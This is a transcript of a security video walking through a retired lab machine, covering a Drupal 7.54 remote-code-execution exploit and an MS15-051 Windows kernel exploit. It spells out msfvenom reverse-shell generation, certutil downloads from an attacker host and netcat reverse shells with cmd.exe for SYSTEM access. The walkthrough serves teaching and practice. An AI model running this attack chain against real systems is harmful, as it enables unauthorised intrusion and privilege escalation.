You're getting access denied. Well, I'm glad you asked. I got you. We are now NT Authority System. Welcome back to DIY Security. Today, we're going to be doing a simulation somewhat of what we would be doing in a pen test. Although we're not going to be diving into every single exploit that you would probably try on a pen test, but in specific, we're going to be looking at a Drupal CMS, or a content management system. And yeah, so if you guys want to follow along, this is an old retired machine. Here it is on the screen if you guys want to look it up. I'm not going to be giving you guys all the answers. I'm just really focusing on the Drupal vulnerability and the exploits of how we can leverage ourselves to escalate our privileges. So first off, what is Drupal? Drupal is a free open source web content management system written in PHP and distributed under the GNU public license. So you may be asking, well, what is a content management system, DIY? Well, I got you. So in short, a CMS, or a content management system, is a software that helps users create, manage, and modify content on a website without the need for technical knowledge. In other words, CMS lets you build a website without needing to write code from scratch or even know how to write code at all. Okay? So with that out the way, we'll jump right in. So the first thing that you would typically want to do, of course, is run a scan to get your lay of the land, figure out what's going on. So in my case, I'll show you the scan that I ran is right here. We did an nmap -p-, which is for all ports, -- open, showing listing all the ports that are open. We did a -ss for stealth scan, and we did a --min rate of 5,000, which is really a lot on an actual pen test assessment. You wouldn't want to do that much. It could, overload the system. On a more sensitive system, typically you would want to do like 300 to 500, or maybe even less on more sensitive systems. So anyway, we got our next is -scv, which is I think it's scan common versions, and we got a -pn, which on Windows machines a lot of times they'll try to ignore like port scans, so this just kind of bypasses that. And then we got the -n, which I believe is it's to help speed it up. It's DNS. I think it ignores the DNS resolution. I think I could be wrong, and then we got -vvv for verbosity, max verbosity, to show us the most that we can possibly see on the scan. We got a -on for output name, and that's going to save our scan as whatever you type here. So going in, we're looking at the Nmap scan. We can see right off the bat, we got port 80 with HTTP. We got a Microsoft server running HTTP, and Nmap seems to have picked up some different directories. And in particular, the one that stands out to me anyway was the changelog. Oh, don't know what I did there. There we go. So yeah, changelog, because changelog, right? It sounds like maybe they're going to be showing the updates of what's going on. So let's go right into it and see. Originally, we come to this page, this Drupal login page, and we could try to do, some SQL testing, which you should, and create a new account, do all that fun jazz. Look up any kind of bypassing methods that you can with Drupal, and you can see at the bottom it says powered with Drupal. But the first thing I want to know is what technology is it using, which it's using Drupal, as we mentioned. Try to look for the version number. So Wapalizer is saying it's a 7, but we want to make sure, we want to dig in even deeper. So the first thing that I normally do is just do a robots.txt. So when we do this robots.txt, we got a lot of stuff that pops up, a lot of different modules and directories that are available. But as I mentioned before, we got this changelog.txt. So I went through all of these, and really that's what it came down to, was this changelog. So going to this, we can see we got Drupal, 7.42. It's telling us the date. So potentially these are pretty much the updates of them changing the versions of Drupal. So as I mentioned before, we knew that it was 7 something. Normally Wappalizer is just going to give you like an estimate. It's not going to give you like the exact version. Sometimes it does, sometimes it's not so accurate. So looking all the way up the top, we can see it is Drupal 7.54. So at that point, what I would want to do is just look up. We type in Drupal. I type in Drupal 7.54 RCE for remote code execution. And I just clicked the first one, and it seemed to actually work. So I'm going to run you through a little bit of what this is. It's just a GitHub page. The guy that made it his name was Pimps. And so yeah, all I did was pretty much copy and paste his code into and made a Python script. And we're going to go ahead and demonstrate that right now. So I'll open up another, and we will run this Python script, this Drupal RCE.py. So the first one we're going to do, this script is supposed to demonstrate RCE, remote code execution. So we'll just do a simple command like Whoami at first. So we'll do http://10.10.10.9, and we'll do a -c for the command, and we'll just type Whoami. Okay, so there we go. We got command execution right here. We can see triggering exploit to execute Whoami, and then we got nt authority I user. Okay, so we don't have a shell, but we do have command execution. Next, we want to figure out a little bit more about this machine. We'll do a system info and try to get the architecture of the machine so we can better get an idea of how our exploit and payload should look. So going down to system type, it looks like we got an x64 based PC. Okay, so knowing this, we'll open up another terminal. We'll go into our transfer. And we will make a msfvenom payload. So we'll do msfvenom-p Windows x64 shell reverse TCP, and our L host is going to be our attacker machine, which is 10.10.14.2, and we'll use the L port of 443. It's going to generate a file, so -f, and the type of file is going to be a executable, and we will name it revshell.exe for reverse shell.exe. All right. So while that's loading, we're gonna run another command. We're gonna actually make, let's see, so we'll do a mkdir dir make directory We'll do a C temp. See if that works. Okay, so temp, it did work. So now that we have that rev shell created up here, it did create. We'll start our Python server. So it'll be Python 3-m HTTP server on port 80. And over here on the machine, we'll do our Python command again, except instead of making the directory, now we're going to put that reverse shell into that directory we just made. So we'll do assert util dash URL cache dash F for file HTTP colon whack whack our attacker IP address, which is 10.10.14.2, and it should be, what do we name it? Rev shell dot exe, and we are going to place it in the C temp, and we can rename it just to make it easier, rshell.exe. See what happened there. I didn't end the quotation, so it didn't quite understand what I was trying to do there. Okay, so we can see it did grab our rev shell. So now we will just, we can exit out of, well, actually, we don't need to exit out of our Python server. We can keep that up. We can clear this, and we will start a netcat listener now. So we'll do netcat nvlp for new verbose listener port on 443, as we mentioned. Yeah. And now we should be able to just run our rev shell. So we will pretty much get rid of everything except for this end. Just like that. All right, there we go. So now we got a shell. We can say, who am I? We're NT authority user, or I user. And you may think, oh, we're NT authority. Well, not quite, because we can try to CD into, let's say, C users, and then administrator, but we get an access denied. So we can CD into, let's say, C users. We'll do a dir, and we can see we got administrator, classic.net, app pool, Demetris. So let's see if we can CD into Demetris. So we can CD into Demetris. Let's do a whoami/priv. Oh, I spelled that wrong. Whoami/priv. Okay. So we got SE change, notify priv, bypass traverse checking is enabled. We can do an impersonation client after authentication, that's enabled. And we got create global objects. Okay. So what I had done next was, I think in a previous video, I ran a power up, one of the Windows escalation videos, but on this one, I actually ran a tool called Sherlock. So I do have Sherlock already on my system. You could run a locate Sherlock on your Kali. It may be on there. If not, you just go get it. But what Sherlock does is similar to Power Up, except it's specifically looking for kernel vulnerabilities, if I'm not mistaken. So what we're going to do is we're actually going to just put this right in there to pull over our Sherlock. And while that's loading up, you guys might be wondering, so yeah, it pulled our Sherlock. This is, I actually found this little cheat sheet. I'll pull it up on the screen. Copy. So yeah, here, change the port to be able to get the file that we actually want. Just modified that a little bit and plugged it right in. So now you can see that this is loaded up, and we got a lot of different things here. And typically on an actual pen test assessment, which I'm just trying to show you guys, I guess, like the motions that that we're going through, but you would want to try like all of these and figure out all of the ones that work, take notes on all of them, which I did go down the list and tried them, and I ended up stopping at MS51, MS1551. And so this whole assessment here, I was trying to stay away from Metasploit or MSF console, right? I was trying to do as much manual exploitation as I could. So even though I looked up on GitHub and found somebody else's script, I mean, it's still considered manual. I'm manually typing in Python and we're running the script. We can modify the script however we want. It's Metasploit is a little bit more easy mode, right? So there is some modules on Metasploit that you can just easily get this box done real quick, but we're not using Metasploit at all for this. So going back to MS15051, I actually looked it up. It is right here. So if we go to it's a SecWiki. There's another GitHub Windows kernel exploits. You can see they list all these different MS, all these MS payloads. All right, so, but for some reason I tried all these, and this MS15051.zip was the only one that I could actually get to work. So it may be different for you guys, but that's pretty much where we're at, where I'm going with this. So at this point, we're already in the machine. We have got a foothold. We're just pretty much, we're a normal user. We're not administrator, and we're trying to escalate to administrator. So now we are going to do another cert util. We got our Python open still. So we'll do a cert util dash URL URL cache. We'll do dash F for file, HTTP : enter our attacker IP address, which is 10.10.14.2, and slash, we're going to pull our netcat.exe. And actually, I just realized, let me just copy this because we're not going to have permission to put it here. And I'll show you guys. I'll just hit enter. Oh, wow. That was interesting. So I didn't think we had permission. No, it didn't even put it there, but it did do something crazy. So what I was going to say is we need to go into our temp. Last time I tried that, it actually, it just said access denied. You do not have permission, but not sure what just happened there. So now we should be able to get this ncat. Okay, I'm just gonna type it out. I'm not sure what is going on when I'm doing this. Cert util. We do URL cache dash f, do http colon whack whack 10.10.14.2, and we'll do our netcat.exe. We'll name it netcat.exe. I actually don't know if I named it. Maybe that's what the problem was. You do have to list what the name of your file is going to be. Okay, so it looks like it did go through there. So now we will pull our ms-15051. So we'll do similarly cert util dash URL cache, do a dash f http colon whack whack 10.10.14.2. We'll do a slash ms-15 dash 051, and this was for the one that I found was for the x64 architecture.exe, and then we'll just rename it to ms-15.exe to kind of simplify the things. So we can see we do got a 200 OK. It did grab it. Now at this point, since we got kicked out of this script, we can just clear this. We will start a netcat listener again. New verbose listener port on 4444. And now we'll just run, should be able to just run the executable ms-15.exe, and we'll do some quotations for it to actually make some commands run within that this command. So it's going to be running netcat exe to our 10.10.14.2, and it's going to be reaching out to 444, and we'll do dash e for execute the cmd.exe. We'll close that and we'll see what happens. Yeah, sorry, I didn't start the netcat listener. So it looks like we do have another shell. Now over here we can do Whoami. We are now NT authority system. So we could do a Whoami / priv. You can see we got a lot more privileges now. And just for good measure, we'll cd into our user / administrator. And there we have it. We are in the administrator directory. We have elevated our privileges to system. And yeah, I thought this was a really cool little kernel exploit and messing around with some old Drupal vulnerabilities. I hope you guys enjoyed it and found this interesting or useful. Make sure you hit that like button, subscribe if you liked what you see. And until next time, you guys have a good rest of your day or night. Be the good guys. Peace.